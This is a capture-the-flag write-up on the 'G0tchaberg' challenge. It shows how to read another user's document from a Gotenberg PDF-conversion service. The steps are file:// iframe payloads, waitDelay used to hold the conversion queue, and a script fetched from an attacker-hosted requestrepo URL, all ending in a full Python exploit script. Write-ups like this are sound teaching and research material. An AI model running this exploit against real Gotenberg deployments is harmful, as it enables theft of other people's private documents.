G0tchaberg

Description

Can you steal the flag, even though I’m using the latest version of https://github.com/gotenberg/gotenberg?

Individual instances can be started at the link below:

https://lab1.kalmarc.tf/

Solution

Initial Look

We are given the source code of the application. There are 4 files: Dockerfile, compose.yml, entrypoint.sh, and index.html.

Dockerfile

The image is based on alpine:latest and installs curl as its only dependency. Both entrypoint.sh and index.html are copied into /app, and entrypoint.sh is made executable and run as the container's command (CMD).

FROM alpine:latest

RUN apk add --no-cache curl

WORKDIR /app

COPY entrypoint.sh index.html ./
RUN chmod +x entrypoint.sh

CMD ["./entrypoint.sh"]

entrypoint.sh

The script sends a POST request to http://gotenberg:3000/forms/chromium/convert/html every 5 seconds, uploading index.html as multipart form data. The resulting PDF is saved as output.pdf.

#!/bin/sh

while true; do
    curl -s 'http://gotenberg:3000/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf
    sleep 5
done

index.html

This is the file that contains the flag.

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Flag</title>
</head>
<body>
	<h1>Very private information!</h1>
    <h2>kalmar{test_flag}</h2>
</body>
</html>

compose.yml

This file is used to start the application. It starts the gotenberg service and the flagbot service. The flagbot service depends on the gotenberg service.

services:
  gotenberg:
    restart: unless-stopped
    image: gotenberg/gotenberg:latest # https://gotenberg.dev/
    ports:
      - "8642:3000"
    networks:
      - local

  flagbot:
    restart: unless-stopped
    build: ./flagbot
    depends_on:
      - gotenberg
    networks:
      - local

networks:
  local:

Gotenberg

Gotenberg provides a developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more! Thanks to Docker, you don’t have to install each tool in your environments; drop the Docker image in your stack, and you’re good to go!

By reading the documentation of Gotenberg, we find all the available routes.

Let’s try to convert a simple HTML file of our own to a PDF file using the /forms/chromium/convert/html route. Our index.html:

<html>
<body>
    <h1>MariosK1574</h1>
</body>
</html>

And the request, sent to the port published in compose.yml:

curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

It works!

Digging Deeper

So far we have no idea how to get the flag. Let’s see if there are any known vulnerabilities or open issues with Gotenberg.

We came across an open issue. According to it, we have local file read under the /tmp directory. It is not yet clear how this helps us: what is stored in /tmp?

Let’s hop into the container and find out more.

We can see there are 2 directories with random UUIDs as names. One holds information about the browser and the other is empty. In the empty one, however, another directory is created for an instant and then deleted. This happens every 5 seconds, the same interval used by the entrypoint.sh script.

Let’s read the documentation again and try to find an option that would allow us to delay the deletion of the temporary files.

Wait Before Rendering

We notice an option called waitDelay, which makes Chromium wait for a given duration after loading the HTML document before converting it to a PDF.

Let’s send a request with the waitDelay option and take another look at /tmp:

curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' --form 'waitDelay=15s' -o ./output.pdf

This is very interesting. Listing the directory once shows a single subdirectory; listing it again a few seconds later shows two. Let’s send another request and check the contents of both.

We can see that in the first directory, there is the original index.html we sent, and in the second directory, there is the index.html containing the flag.

Now we are starting to understand how Gotenberg works.

Exploitation

Chromium Queue

From our experiments, we got a grasp of how the Chromium queue works in Gotenberg. Every request sent to the Chromium service is added to a queue. For each queued request, a new directory with a random UUID as its name is created, and the original documents to be converted are stored in it. Requests are processed one at a time. Once a request has been processed and the document converted to PDF, its directory is deleted and the PDF is sent back to the user. Finally, the request is removed from the queue and the next one is processed.
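To make the timing concrete, here is a minimal Python sketch of the queue model described above. It is a toy simulation, not Gotenberg's actual code: the names Request, simulate, and dirs_at are made up for illustration, and it assumes a directory exists from the moment its request arrives until that request finishes processing.

```python
from dataclasses import dataclass


@dataclass
class Request:
    name: str
    arrival: float   # second at which the request reaches the service
    duration: float  # seconds spent processing it (including any waitDelay)


def simulate(requests):
    """Return {name: (dir_created, dir_deleted)} for a strictly sequential queue."""
    timeline = {}
    free_at = 0  # time at which the single worker becomes free again
    for req in sorted(requests, key=lambda r: r.arrival):
        start = max(req.arrival, free_at)   # wait for the previous request
        free_at = start + req.duration      # processing ends, directory is deleted
        timeline[req.name] = (req.arrival, free_at)
    return timeline


def dirs_at(timeline, t):
    """Names of the requests whose temporary directory exists at time t."""
    return sorted(n for n, (created, deleted) in timeline.items() if created <= t < deleted)


# Our request arrives first and stalls the queue for 15 seconds;
# the flagbot request arrives 3 seconds later and has to wait.
timeline = simulate([Request("attacker", 0, 15), Request("flagbot", 3, 1)])
print(timeline)
print(dirs_at(timeline, 10))
```

Under this model, the flagbot directory sits on disk for the whole time our delayed request is being processed, which matches what we observed in /tmp.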

File Read

Let’s create a temporary file (“Hello World!”) at /tmp/test.txt inside the container and try to read it with the following index.html:

<iframe src="file:///tmp/test.txt"></iframe>

curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

The file is read successfully. Let’s also try to list the contents of the /tmp directory:

<iframe src="file:///tmp/" width="100%" height="100%"></iframe>

curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

We can see that the contents of the /tmp directory are listed successfully.
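Since every later payload is a variation of the same iframe, a small helper can generate them. The following is only a sketch: build_iframe_payload and its parameters are hypothetical names, and the optional delay mirrors the setTimeout approach used in the payloads further down.

```python
import json

TEMPLATE = """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
      setTimeout(function () {{
        var iframe = document.createElement('iframe');
        iframe.src = {src};
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
      }}, {delay_ms});
    </script>
  </body>
</html>"""


def build_iframe_payload(path, delay_ms=0):
    """Return an HTML page that loads file://<path> in an iframe after delay_ms."""
    if not path.startswith("/tmp/"):
        # Only /tmp was readable in our tests, so reject anything else early.
        raise ValueError("path must be under /tmp/")
    src = json.dumps("file://" + path)  # emit a properly quoted JavaScript string
    return TEMPLATE.format(src=src, delay_ms=int(delay_ms))


print(build_iframe_payload("/tmp/", delay_ms=5000))
```

The result can be saved as index.html and submitted with the same curl command as above.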

So far we know the following:

  • We can list the contents of the /tmp directory
  • We can read files in the /tmp directory
  • We know the flag is stored in the /tmp directory
  • We can delay the deletion of the temporary files, allowing us to read the flag

Let the Magic Begin

When we start thinking about the attack chain, we immediately run into a problem. We could send a delayed request that lists the directories to get the UUID of the directory containing the flag, but as soon as that request completes, the flag will be deleted. We would have the correct UUID, yet a follow-up request to read the flag would fail because the file is no longer there.

After some brainstorming, we come up with the following attack chain:

  • Send a request to list the contents of the /tmp directory to get the UUID of the empty directory.
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>
  • Send a request to list the contents of the empty directory to get the UUID of the directory that contains the flag. This request contains an iframe that loads the empty directory. The iframe is created after a delay so that the other requests have enough time to enter the queue. (1st request in the queue)
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var uuid = '';
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>
  • Immediately send a request to read the flag. This request contains a script tag that loads a script hosted on our server, which dynamically creates an iframe that loads the flag. The delay gives us enough time to process the previous responses, extract the UUIDs from the PDFs, and update the hosted script. (2nd request in the queue)
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = 'https://t9gk8ph0.requestrepo.com/main.js';
            document.head.appendChild(script);

        }, 15000);
    </script>
  </body>
</html>
The hosted main.js:
var uuid1 = '';
var uuid2 = '';
var iframe = document.createElement('iframe');
iframe.src = `file:///tmp/${uuid1}/${uuid2}/index.html`;
iframe.height = 1000;
iframe.width = 1000;
document.body.appendChild(iframe);
  • The flagbot service sends its request to convert the index.html file containing the flag to a PDF. (3rd request in the queue)

Automated Python Script

We implemented the attack chain in a Python script. It uses requestrepo to host main.js.

Note: You may have to run the script 3-4 times, since we haven’t found a way to identify with certainty which UUID from the 3 we get is the correct one.
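One untested variation that might reduce the number of re-runs is to have main.js create one iframe per candidate UUID instead of committing to a single guess. The sketch below only builds the JavaScript source; build_main_js and the iframe size are illustrative choices, and it assumes every candidate directory contains an index.html, as observed earlier.

```python
import json
import re

UUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)


def build_main_js(parent_uuid, candidate_uuids):
    """Return JavaScript that loads index.html from every candidate directory."""
    for value in [parent_uuid, *candidate_uuids]:
        if not UUID_RE.match(value):
            raise ValueError(f"not a UUID: {value!r}")
    urls = [
        f"file:///tmp/{parent_uuid}/{child}/index.html"
        for child in candidate_uuids
    ]
    return (
        f"var urls = {json.dumps(urls)};\n"
        "urls.forEach(function (src) {\n"
        "    var iframe = document.createElement('iframe');\n"
        "    iframe.src = src;\n"
        "    iframe.height = 300;\n"
        "    iframe.width = 1000;\n"
        "    document.body.appendChild(iframe);\n"
        "});\n"
    )
```

The returned string could be uploaded in place of the single-iframe script; the resulting PDF would then show our own documents next to the flag page.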

import requests
import fitz
import re
from io import BytesIO
from requestrepo import Requestrepo
import concurrent.futures
import time

base_url = "https://9848daeb59d6995c04676fa4311bc27f-51763.inst1.chal-kalmarc.tf"
url = f"{base_url}/forms/chromium/convert/html"
requestrepo_url = "" # Your requestrepo URL, ending with "/" ("main.js" is appended to it)
token = "" # Your requestrepo token

uuid_pattern = r"\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b"

stages = [
    {
        "name": "Stage-1",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>""",
        "waitDelay": "1s"
    },
    {
        "name": "Stage-2",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var uuid = '{uuid1}';  // Insert uuid1 here
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    },
    {
        "name": "Stage-3",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = '"""+requestrepo_url+"""main.js';
            document.head.appendChild(script);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    }
]

def extract_uuids_from_pdf(pdf_data):
    pdf_stream = BytesIO(pdf_data)
    doc = fitz.open(stream=pdf_stream, filetype="pdf")

    extracted_text = "\n".join([page.get_text("text") for page in doc])

    uuids = re.findall(uuid_pattern, extracted_text)
    
    return uuids, extracted_text

def process_stage(stage, uuid1=None, uuid2=None, uuid3=None, uuid4=None):
    print(f"\n🚀 Sending {stage['name']} request...")

    if(stage["name"] == "Stage-3"):
        time.sleep(1)

    html_content = stage["html"]
    if uuid1:
        html_content = html_content.replace("{uuid1}", uuid1)
    if uuid2:
        html_content = html_content.replace("{uuid2}", uuid2)
    if uuid3:
        html_content = html_content.replace("{uuid3}", uuid3)
    if uuid4:
        html_content = html_content.replace("{uuid4}", uuid4)

    files = {"files": ("index.html", html_content, "text/html")}
    data = {"waitDelay": stage["waitDelay"]}

    response = requests.post(url, files=files, data=data)

    if response.status_code == 200:
        pdf_data = response.content

        uuids, extracted_text = extract_uuids_from_pdf(pdf_data)

        print(f"\n📝 Extracted Text from {stage['name']} PDF:\n")
        print(extracted_text)

        if uuids:
            print("\n🔍 Extracted UUIDs:")
            for uuid in uuids:
                print(uuid)
            return uuids
        else:
            print("\n❌ No UUIDs found in the extracted text.")
            return None
    else:
        print(f"⚠️ Error: Received status code {response.status_code}")
        print(f"⚠️ Error: Received response content {response.content}")
        return None

def update_requestrepo(uuids):
    client = Requestrepo(token=token, host="requestrepo.com", port=443, protocol="https")

    if len(uuids) >= 3:
        script_content = f"""
        var uuid1 = '{uuids[0]}';
        var uuid2 = '{uuids[2]}';
        var iframe = document.createElement('iframe');
        iframe.src = `file:///tmp/${{uuid1}}/${{uuid2}}/index.html`;
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
        """
        
        client.update_http(raw=script_content.encode())
        client.update_http(headers={"Content-Type": "application/javascript"})
        print("\n✅ main.js updated with the UUIDs.")
    else:
        print("❌ Not enough UUIDs to update main.js.")

def test_stages_concurrently():
    print("🚀 Starting Stage-1...")
    uuids_stage_1 = process_stage(stages[0])

    if uuids_stage_1:
        uuid1 = uuids_stage_1[1]
        print(f"🔑 Extracted UUID from Stage-1: {uuid1}")

        with concurrent.futures.ThreadPoolExecutor() as executor:
            future_stage_2 = executor.submit(process_stage, stages[1], uuid1)
            future_stage_3 = executor.submit(process_stage, stages[2], uuid1)

            uuids_stage_2 = future_stage_2.result()
            if uuids_stage_2:
                print("\n🔑 Extracted UUIDs from Stage-2:")
                for uuid in uuids_stage_2:
                    print(uuid)
                update_requestrepo(uuids_stage_2)

            uuids_stage_3 = future_stage_3.result()
            if uuids_stage_3:
                print("\n🔑 Extracted UUIDs from Stage-3:")
                for uuid in uuids_stage_3:
                    print(uuid)

                uuids = uuids_stage_2 + uuids_stage_3
                print("\n🔑 Combined UUIDs extracted from Stage-2 and Stage-3:")
                for uuid in uuids:
                    print(uuid)

if __name__ == "__main__":
    test_stages_concurrently()

Dependencies:

pip install PyMuPDF requestrepo requests

Flag

The flag is kalmar{g0tcha!_well_done_that_was_fun_wasn't_it?_we_would_appreciate_if_you_create_a_ticket_with_your_solution}.

This post is licensed under CC BY 4.0 by the author.